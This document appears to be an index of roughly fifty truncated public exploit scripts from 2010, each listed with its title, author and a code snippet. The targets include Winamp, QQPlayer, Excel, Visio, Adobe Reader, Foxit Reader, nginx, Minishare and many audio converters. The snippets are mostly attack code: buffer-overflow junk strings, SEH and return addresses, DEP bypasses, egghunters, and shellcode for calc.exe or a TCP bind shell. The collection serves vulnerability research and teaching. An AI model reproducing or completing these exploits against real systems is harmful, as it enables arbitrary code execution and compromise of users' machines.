SyncBack-Freeware-3.2.20.0

Software : SyncBack Freeware V3.2.20.0 Author : Lincoln Date : May 19, 2010 Reference : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-041 OS : Windows puts "+ Exploit for SyncBack Freeware V3.2.20.0" Zip Headers header1= "\x50\x4B\x03\x04\x14\x00\x00\x00" +...

BaoFeng-Storm-M3U

Title: BaoFeng Storm M3U File Processing Buffer Overflow Exploit CNVD-ID: CNVD-2010-00752 Author: Lufeng Li and Qingshan Li of Neusoft Corporation Download: www.baofeng.com Test: Put m3u file in roote.g. c:/ d:/,and open this m3u file file= "baofeng.m3u" junk ="\x41"795 nseh="\x61\xe8\xe1"...

GSM-SIM-Utility-5.15

Exploit Title : GSM SIM Utility sms file Local SEH BoF Date : June 28, 2010 Author : chap0 www.seek-truth.net Download Link : http://download.cnet.com/GSM-SIM-Utility/3000-185084-10396246.html?tag=mncol Version : 5.15 import time sc ="d9eb9bd97424f431d2b27a31c964" "8b71308b760c8b761c8b46088b7e"...

Winamp-5.572---Local-BoF

Exploit Title: Winamp v5.572 Local BoF Exploit Win7 ASLR and DEP Bypass Date: June 26, 2010 Author: Node Software Link: http://download.nullsoft.com/winamp/client/winamp5572fullemusic-7plusen-us.exe Badchars: \x00\xff\x5c\x2f\x0a\x0d\x20 version = "Winamp 5.572" rop = "A" 540 Offset rop +=...

FieldNotes-32-5.0

Title: FieldNotes 32 v5.0 SEH 0day Date: 25/06/2010 Author: TecR0c - http://tecninja.net/blog aka Rocco Calvi Found by: TecR0c - http://twitter.com/TecR0c Advisory: http://www.corelan.be:8866/advisories.php?id=CORELAN-10-053 msg = TITLE=Corelan TEXT="TecR0c pwned you"...

Orbital-Viewer-1.04-(.ov)

Pro: Orbital Viewer v1.04 .orb/.ov Local Universal Stack Overflow Exploit SEH Author: CrazyHacker Download: http://www.orbitals.com/orb/setupov.exe Date: 20-6-2010 $junk = 6060; $header = "OrbitalFileV1.0\n"; $nseh = "\xeb\xf9\xff\xff"; jmp back 7 bytes $seh = "\x0b\x0b\x27\x00"; universal pop eb...

Batch-Audio-Converter-Lite-Edition-1.0.0.0

Tested on: Windows XP SP2 Type of Vuln: SEH Code : bacon-exploit.py Greetz: Otoy, Postnix, Jasakom Community, Kilurah, Gesang, dan wedus-wedus import struct junk = "A" 4132 nseh = "\xeb\x06\x90\x90" seh = struct.pack'L', 0x10029bb7 pop edi pop esi ret from lameenc.dll nop = "\x90" 30 print "+...

Rosoft-Audio-Converter-4.4.4

Exploit Title: Rosoft Audio Converter 4.4.4 Buffer Overflow Date: June 14, 2010 Author: Blake Software Link: http://www.rosoftengineering.com/freeware/RosoftAudioConverterFree.aspx Version: 4.4.4 calc.exe sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"...

Exploit-Easy-RM-to-MP3-2.7.3.700

Exploit Title: Easy RM to MP3 2.7.3.700 Local Buffer Overflow .m3u , .pls , .smi , .wpl , .wax , .wvx , .ram Date: 4 / 8 / 2010 Author: Oh Yaw Theng Software Link: http://www.exploit-db.com/application/10642/ Version: 2.7.3.700 Tested on: Windows XP SP 1 This exploit works for all the file...

Mini-stream-RM-MP3-Converter

Tested on Windows XP SP3 Pro Found By : Cyber-Zone ABDELKHALEK http://www.securityfocus.com/bid/34494 The way exploit written is slightly different than above Vulnerability handler = "ftp://" buff1 = "D" 17418 eip = "\x7D\xA5\x04\x10" 0x1004A57D jmp esp C:\Program...

WM-Downloader-3.1.2.2-2010.04.15

Exploit Title: WM Downloader 3.1.2.2 2010.04.15 Buffer Overflow SEH Date: 2010-07-28 Author: fdisk @fdiskyou e-mail: fdiskyou at deniable.org payload = "\x41" 43485 payload += "\xeb\x16\x90\x90" jump payload += "\xb4\x15\xbb\x01" ppr - WDCodec00.dll payload += "\x90" 16 windows/exec - 227 bytes...

QQPlayer-2.3.696.400p1-smi

A different SEH addr might be necessary for XP SP3 ENG. Make sure EAX aligns to the shellcode before decoding. head =''' ''' payload=head+junk+nseh+seh+adjust+shellcode+junk+foot fobj = open"poc.smi","w" fobj.writepayload fobj.close...

QQPlayer-cue-File-Buffer-Overflow

Title: QQPlayer cue File Buffer Overflow Exploit Author: Lufeng Li of Neusoft Corporation Vendor: www.qq.com Platform: Windows XPSP3 Chinese Simplified head = '''FILE "''' junk = "A" 780 nseh ="\x42\x61\x21\x61" seh ="\xa9\x9e\x41\x00" adjust="\x32\x42\x61\x33\xca\x83\xc0\x10"...

QQPlayer-asx-File-Processing-Buffer-Overflow

Title: QQPlayer asx File Processing Buffer Overflow Exploit Author: Li Qingshan of Information Security Engineering Center,School of Software and Microelectronics,Peking University Vendor: www.qq.com head =''' ''' payload=head+junk+nseh+seh+adjust+shellcode+junk+foot fobj = open"poc.asx","w"...

Microsoft-Excel-0x5D-record

This is an exploit for MS10-038/CVE-2010-0822 Everything is hardcoded! winxp sp3 webDEViL import binascii wD="d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000" wD+="000000000000000000030000000100000000000000001000000200000004000000feff"...

Foxit-Reader-4.0-PDF

Product: Foxit Reader 4.0 Platforms: Windows XP, Windows Vista Web: http://eternal-todo.com import sys,zlib def getFFShellcodesc: ffsc = '' if lensc%4 != 0: sc += 4-lensc%4'\x00' for i in range0,lensc,4: ffsc += '\xff'+sci+3+sci+2+sci+1+sci return ffsc outputHeader = ''' outputFileName =...

Microsoft-Excel-Malformed-FEATHEADER

MS Excel Malformed FEATHEADER Record Exploit CVE-2009-3129, MS09-067, OSVDB-59860 Vulnerble application MS office 2003/2007 import sys import zlib Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes by RubberDuck = shellcode = b"\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"...

A-PDF-WAV-to-MP3-1.0.0

This exploit uses SEH to gain code execution, while EDB 14676 uses a direct EIP overwrite which is operating system specific. code = "\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49" "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"...

Triologic-Media-Player-8-(.m3u)

Exploit Title: Triologic Media Player 8 .m3u Local Universal Unicode Buffer Overflow SEH Date: August 17, 2010 Software Link: http://download.cnet.com/Triologic-Media-Player/3000-21394-10691520.html buffer = "\x41" 536 buffer buffer += "\x61\x41" popad + nop/align buffer += "\xF2\x41" pop,pop,ret...

MUSE-4.9.0.006-(.pls)

Exploit Title: MUSE v4.9.0.006 .pls Local Universal Buffer Overflow SEH Date: August 17, 2010 Author: Glafkos Charalambous glafkos@astalavistadotcom payload = "\x41" 1376 payload += "\xeb\x06\x90\x90" payload += "\xAA\x0c\x02\x10" 10020CAA sdll.dll universal payload += "\x90" 16 win32exec -...

MUSE-4.9.0.006-(.m3u)

Exploit Title: MUSE v4.9.0.006 .m3u Local Buffer Overflow Exploit Date: August 17, 2010 Author: Glafkos Charalambous glafkos@astalavistadotcom buffersize = 205 nopsled = "\x90" 4 Custom MessageBox x86/shikataganai succeeded with size 104 iteration=1 shellcode =...

Rosoft-media-player-4.4.4

Original Advisory:http://www.exploit-db.com/exploits/14601 - abhishek lyall Download:http://www.exploit-db.com/application/14601/ Platform:Windows XP SP3 EN Professional - VMware outputfile="exploit.m3u" junk="\x41"3470 nseh="\xeb\x88\x90\x90" reverse jump 118 bytes seh="\x49\xd4\x46\x00" PPR -...

Xion-Player-1.0.125

Script provided as is without any warranty. Use for educational purposes only. Do not use this code to do anything illegal ! Corelan does not want anyone to use this script outputfile="corelanc0d3r.m3u" offsettonseh=250 affected by the m3u path length ! junk = "A" offsettonseh nseh="\x41\x45"...

Mediacoder-0.7.5.4710-Universal

Mediacoder 0.7.5.4710 Universal SEH Buffer Overflow Exploit Coded By: DrIDE Found By: abhishek lyall Usage: Load the evil .m3u file and click on it. Download: http://www.exploit-db.com/application/14612 code = "\x89\xe6\xda\xdb\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49"...

Mediacoder-0.7.5.4710

media coder 0.7.5.4710 0 day buffer overflow exploit vulnerble application link http://www.mediacoderhq.com/dlfull.htm tested on XP SP2 filename = "crash.m3u" junk = "\x41" 256 eip = "\x65\x82\xa5\x7c" JMP ESP shell32.dll nop = "\x90" 12 port bind 5555 shellcode scode =...

Fat-Player-0.6b-WAV

Stack-based buffer overflow in Fat Player 0.6b allows remote attackers to execute arbitrary code via a long string in a .wav file. NOTE: some of these details are obtained from third party information. print "\nFat Player 0.6b WAV File Processing Buffer Overflow SEH" buff1 = "D" 4132 nseh =...

myMP3-Player-3.0

Exploit Title: myMP3-Player 3.0 NOT SEH Overwrite Date: 882010 Author: Oh Yaw Theng Software Link: http://www.chip.de/downloads/myMP3-Player-3.013008621.html filename = "crash.m3u" junk = "\x41" 1024 ret = "\x65\x82\xA5\x7C" 7C A5 82 65 FFE4 JMP ESP Bind shell at TCP Port 5555 Telnet to this port...

nginx-0.6.38-Heap

A quick way to find out just for verification would be to launch nginx, attach GDB to the worker and target it with the exploit, setting the offset to 0, or some other arbitrary value. It should crash on a piece of code which import os import sys import socket import select import struct import...

Microsoft-Excel-OBJ-Record

Title: Microsoft Excel OBJ Record Stack Overflow Version: Excell 2002 and XP SP3 Analysis: http://www.abysssec.com import sys def main: try: fdR = open'src.xls', 'rb+' strTotal = fdR.read str1 = strTotal:36640 str2 = strTotal37440: shellcode calc.exe shellcode =...

Acoustica-Audio-Converter-Pro-1.1

Exploit Title: Acoustica Audio Converter Pro 1.1 build 25 Heap Overflow.mp3.wav.ogg.wma PoC Date: September 21 2010 Author: Carlos Hollmann Software Link: http://www.acoustica.com/audio-converter/download.htm m3u = "crash.m3u" payload =...

A-PDF-All-to-MP3-Converter-1.1.0

Exploit Title: A-PDF All to MP3 Converter v.1.1.0 Universal Local SEH Exploit Date: September 18, 2010 Author: modpr0be import struct junk1 = 'A' 4132 nseh = "\xeb\x06\x90\x90" seh = struct.pack'L', 0x00408B44 ppr nops2 = "\x90" 12 metasploit payload windows/exec cmd=calc | msfencode -e...

DJ-Studio-Pro-8.1.3.2.1

DJ Studio Pro Version 8.1.3.2.1 SEH 0 day Author Abhishek Lyall - abhilyallatgmaildotcom, infoataslitsecuritydotcom Web - http://www.aslitsecurity.com/ filename = "ASL.pls" windows/exec - CMD=calc.exe shellcode = "\x41\x42\x48\x49\x41\x42\x48\x49" Egg Hunted...

BACnet-OPC-Client-Buffer-Overflow

After communicating via several emails with the vendor, sharing details about the vulnerability, as well as proof-of-concept code I also offered to send the exploit code for them to test themselves, it was clear that they weren't very interested in fixing the vulnerability. import sys import stru...

Honestech-VHS-to-DVD

Exploit Title: Honestech VHS to DVD 3.0.30 Deluxe Local Buffer Overflow SEH Date: September 16, 2010 Author: Brennon Thomas [email protected] Software Link: n/a Version: 3.0.30.0 Deluxe buf = "\r\n\ \r\n\ \r\n\ \r\n\ MAINDLG\r\n\ PAGE=0\r\n\ \r\n\ AVICODEC\r\n\ VIDEOCODEC=DivX 6.8.5 Codec 2...

Adobe-Acrobat-and-Reader

Title: Adobe Acrobat and Reader "pushstring" Memory Corruption Version: Adobe Reader 9.3.2 Analysis: http://www.abysssec.com import sys class PDF: def initself: self.xrefs = self.eol = '\x0a' self.content = '' self.xrefsoffset = 0 def headerself: self.content += '%PDF-1.6' + self.eol def objself,...

Excel-RTD-Memory-Corruption

Analysis: http://www.abysssec.com Vendor: http://www.microsoft.com Impact: Critical import sys def main: try: fdR = open'src.xls', 'rb+' strTotal = fdR.read str1 = strTotal:4509 str2 = strTotal5013:15000 str3 = strTotal15800: eip = "\xAd\x57\x00\x30" pop pop ret jmp = "\xF7\xC2\x03\x30" call esp...

Audiotran-1.4.2.4-SEH

Audiotran 1.4.2.4 SEH Overflow Exploit 0 day Download Vulnerable application from http://www.e-soft.co.uk/Audiotran.htm Vulnerable version Audiotran 1.4.2.4 filename = "ASL.pls" windows/exec - CMD=calc.exe shellcode = b"\xDB\xDF\xD9\x74\x24\xF4\x58\x2B\xC9\xB1\x33\xBA"...

Acoustica-MP3-Audio-Mixer-2.471

The software doesn't handle correctly M3U's header and extra info when is being imported on a open sound group. Trigger: launch app, open an existing sound group i.eC:\Program Files\Acoustica MP3 Audio Mixer\example.sgp then import the crash.m3u and....KaaaaBooom!! magic = "crash.m3u" vuln =...

Microsoft-Office-Visio-DXF

Title: Microsoft Office Visio DXF File Stack based Overflow Version: Microsoft Office Visio 2002xp Analysis: http://www.abysssec.com import sys def main: try: fdR = open'src.dxf', 'rb+' strTotal = fdR.read str1 = strTotal:100 str2 = strTotal1020:1124 str3 = strTotal1128:1169 str4 = strTotal1173:...

Minishare-1.5.5-Buffer-Overflow

Exploit Title: Minishare 1.5.5 Buffer Overflow Vulnerability users.txt Date: 11/02/2010 Author: Chris Gabriel Software Link: http://sourceforge.net/projects/minishare Version: 1.4.0 - 1.5.5 shellcode = "TYVTX10X41PZ41H4A4H1TA91TAFVTZ32PZNBFZDQE02D" "QF0D13DJE1F4847029R9VNN0D668M194A0I5G5L2G3W3"...

Winamp-5.5.8.2985-(in_mod-plugin)

Pwn And Beans by Mighty-D and 7eK presents: Winamp 5.5.8.2985 inmod plugin Stack Overflow A Script Kiddie Friendly Production...

Winamp-5.5.8-(in_mod-plugin)

Pwn And Beans by Mighty-D presents: Winamp 5.5.8.2985 inmod plugin Stack Overflow WINDOWS XP SP3 FULLY PATCHED - NO ASLR OR DEP BYPASS... yet Bug found by http://www.exploit-db.com/exploits/15248/ POC by fdisk header =...

FatPlayer-0.6b-(.wav)

Exploit Title: FatPlayer 0.6b Malicious WAV Buffer Overflow Vulnerability SEH Date: 10/18/10 Author: james AT learnsecurityonline DOT com Software Link: http://sourceforge.net/projects/fatplayer/files/ Version: 0.6 Beta junk = "\x41" 4132 nSEH = "\x90\x90\xeb\x06" SEH = 0x0046bee3.pack'V' pop pop...

Quick-Player-1.3-Unicode

Download Vulnerable application from http://download.cnet.com/Quick-Player/3640-21684-10871418.html Vulnerable version Quick Player 1.3 Tested on XP SP2 filename = "ASL.m3u" windows\exec calc.exe unicode uppercase shellcode...

Minishare-1.5.5-BoF

Exploit Title: Minishare 1.5.5 Buffer Overflow Vulnerability users.txt - EggHunter Version Date: 11/19/2010 Author: 0v3r Bug Found By: Chris Gabriel Software Link: http://sourceforge.net/projects/minishare egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"...

MP3-Nator-Buffer-Overflow

Exploit Title: Exploit Buffer Overflow MP3-Nator SEH - DEP BYPASS Date: 18-11-2010 Author: Muhamad Fadzil Ramli Credit/Bug Found By: C4SS!0 G0M3S Software Link: http://files.brothersoft.com/mp3audio/players/mp3nator.zip filename = 'crash.plf' ./msfpayload windows/exec CMD=calc EXITFUNC=seh R |...

DIZzy-1.12-Local

Exploit Title: DIZzy 1.12 Local Stack Overflow Google Dork: n/a Date: 17/11/2010 Author: g30rg3x shellcode = "\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC" + "\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45" + "\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45" +...

Foxit-Reader-4.1.1-EggHunter

Date: 15 Nov 10 Author: dookie at offsec.com App: Foxit Reader 4.1.1 preamble =...

Realtek-HD-Audio-Control-Panel-2.1.3.2

App. has classic buffer overflow vulnerability it can be triggered by passing a too long argument as a startup parameter. Shellcode can by run via classic ret overwrite or SEH Handler overwrite filepath = "C:\ShellCode\RTHDCPL 2.1.3.2 - Exploit.bin" f = openfilepath, "wb" f.write'A'4...

Realtek-Audio-Microphone-Calibration-1.1.1.6

App. has classic buffer overflow vulnerability it can be triggered by passing too long argument as a startup parameter. Shellcode can by run via classic ret overwrite or SEH Handler overwrite filepath = "C:\ShellCode\MicCal 1.1.1.6 - Exploit.bin" f = openfilepath, "wb" dummy data f.write'\x90'...